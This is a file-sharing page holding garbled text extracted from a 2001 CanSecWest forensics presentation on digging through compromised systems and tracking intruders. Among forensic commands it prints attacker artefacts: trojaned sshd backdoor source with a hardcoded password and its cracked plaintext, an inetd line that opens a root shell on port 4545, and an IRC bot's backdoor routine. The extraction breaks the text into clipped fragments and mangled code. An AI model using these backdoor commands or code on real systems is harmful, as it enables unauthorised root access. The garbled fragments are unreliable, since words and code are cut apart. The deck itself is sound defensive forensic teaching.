ImageVerifierCode 换一换
格式:PPT , 页数:41 ,大小:120KB ,
资源ID:379292      下载积分:2000 积分
快捷下载
登录下载
邮箱/手机:
温馨提示:
如需开发票,请勿充值!快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。
如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝扫码支付 微信扫码支付   
注意:如需开发票,请勿充值!
验证码:   换一换

加入VIP,免费下载
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【http://www.mydoc123.com/d-379292.html】到电脑端继续下载(重复下载不扣费)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录  

下载须知

1: 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。
2: 试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。
3: 文件的所有权益归上传用户所有。
4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
5. 本站仅提供交流平台,并不能对任何下载内容负责。
6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

版权提示 | 免责声明

本文(CanSecWest '01.ppt)为本站会员(hopesteam270)主动上传,麦多课文库仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知麦多课文库(发送邮件至master@mydoc123.com或直接QQ联系客服),我们立即给予删除!

CanSecWest '01.ppt

1、Jump to first pageCanSecWest 01Digging Through Compromised Systems and Tracking IntrudersDave DittrichComputing unrm honeypot.hda$i.dd | strings | grep d33e8f1a6397c6 donehda1hda5# ./configure -enable-global=d33e8f1a6397c6d2efd9a2aae748eb02-enable-sshd-log=/usr/tmp/nap -cache-file=/./config.cache. .

2、 . / “d33e8f1a6397c6d2efd9a2aae748eb02“;#define USE_GLOBAL_PASS “d33e8f1a6397c6d2efd9a2aae748eb02“ . . .echo “running $CONFIG_SHELL-/bin/sh ./configure-enable-sshd-log=/usr/tmp/nap -cache-file=/./config.cache. . .$ac_eAUSE_GLOBAL_PASS$ac_eBUSE_GLOBAL_PASS$ac_eC“d33e8f1a6397c6d2efd9a2aae748eb02“$ac_e

3、Dd33e8f1a6397c6d2efd9a2aae748eb02hda6hda7hda8Jump to first pageDeleted i-node timestamp analysis# grave-robber -c /t -m -d . -o LINUX2# for i in 1 5 6 7 8 do ils honeypot.hda$i | ils2mac hda$i.ilsbody done# ls -l *body-rw-r-r- 1 root root 3484454 Feb 15 23:01 body-rw-r-r- 1 root root 207 Feb 17 14:4

4、2 hda1.ilsbody-rw-r-r- 1 root root 179650 Feb 17 14:42 hda5.ilsbody-rw-r-r- 1 root root 207 Feb 17 14:42 hda6.ilsbody-rw-r-r- 1 root root 796 Feb 17 14:42 hda7.ilsbody-rw-r-r- 1 root root 12618 Feb 17 14:42 hda8.ilsbody# cat hda?.ilsbody body-deleted# cat body body-deleted body-full# mactime -p /t/e

5、tc/passwd -g /t/etc/group -b body-full 11/06/2000 mactime.txtJump to first pageDeleted i-nodesAug 09 00 12:52:37 18698240 m -rw-r-r- 1010 users Nov 08 00 06:52:59 18698240 .a. -rw-r-r- 1010 users Nov 08 00 06:56:08 18698240 c -rw-r-r- 1010 users Jump to first pageRecovered source#ifdef USE_GLOBAL_PA

6、SS/* Check if the “global“ password was entered */int check_global_passwd( unsigned char *pass )/* Paste here the output from md5sum -string=“Your_Password“ */ char md5passwd33=USE_GLOBAL_PASS;/ “3e3a378c63aa1e55e3e9ae9d2bdcd6a1“; struct MD5Context md;unsigned char md5buffer32; int i;/* Compute the

7、response. */ MD5Init(MD5Update( MD5Final(md5buffer, for( i = 15; i = 0; i- ) md5bufferi*2+1 = (md5bufferi md5bufferi*2 = (md5bufferi 4) + 0;Jump to first pageConfirmation of backdoor password#define USE_GLOBAL_PASS “d33e8f1a6397c6d2efd9a2aae748eb02“# md5sum -string=tw1Lightz0ned33e8f1a6397c6d2efd9a2

8、aae748eb02 “tw1Lightz0ne“Jump to first pageCommand line in swap spacerootapollo linux# ./dd bs=1024 DEEFFGG08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000. . .F* FF+, NV1/bin/sh -c e

9、cho 4545 stream tcp nowait root /bin/sh sh -i /etc/inetd.conf;killall -HUP inetdNov 8 04:02:00 apollo anacron2159: Updated timestamp for job cron.daily Techniques by Wietse Venema and Peter KosinarJump to first pageContents of IRC bot config file# tPACK.tcl coded by T0R0 - - www.falcon- #set homech

10、an “#tpack“set admin “TORO X-cess“set vers “2.3“set altnick “$nick-“set username “$nick“set realname “www.$“set userfile “.log.yesterday“set channel-file “.log.today“. . .proc dcc_flags handle idx arg set a lindex $arg 0 set z decrypt xx3fw3 bijph.s5f7N0if $handle = $z set p “decrypt f3qcadr3 DtVgR.

11、E/mLu1“if $a = $p if !validuser $z adduser $z *!*torowill.fuck.for.an.o-line.st chpass $z temp123 . . .Jump to first pageDecryption (part 1)egg.log6692 set z decrypt xx3fw3 bijph.s5f7N0 TORO6694 set p “decrypt f3qcadr3 DtVgR.E/mLu1“ die06769 set p “decrypt aSp81yAFiA/oyjc iU3CW.7pnwu/“ reset07116 de

12、crypt clFua/ACQSB1aDZNz182aru0R0cJ1/8kzBZ/ 9xC15/VBEut1 decrypt 6iI5s1U/0kj0ux9EJ.VDFeS0 EPffD1HbaPj. decrypt X7EnV1qJu9J/sUhVd0C5mZM. ftxIp0RBYWq. decrypt uutWQ0VGi8k0rF0xV1lTiK5. XLnzYz0yt0 decrypt iys4f1DqXWm0FdGom/KfLuC1 qRt8A.4SMM20 bind chon - * on_dcc7328 set wmail “decrypt 65ty0hXeau/pk77x.dX 3AEfl/.23el/GowxN.aUrJT1“ Technique by Marco Walther

copyright@ 2008-2019 麦多课文库(www.mydoc123.com)网站版权所有
备案/许可证编号:苏ICP备17064731号-1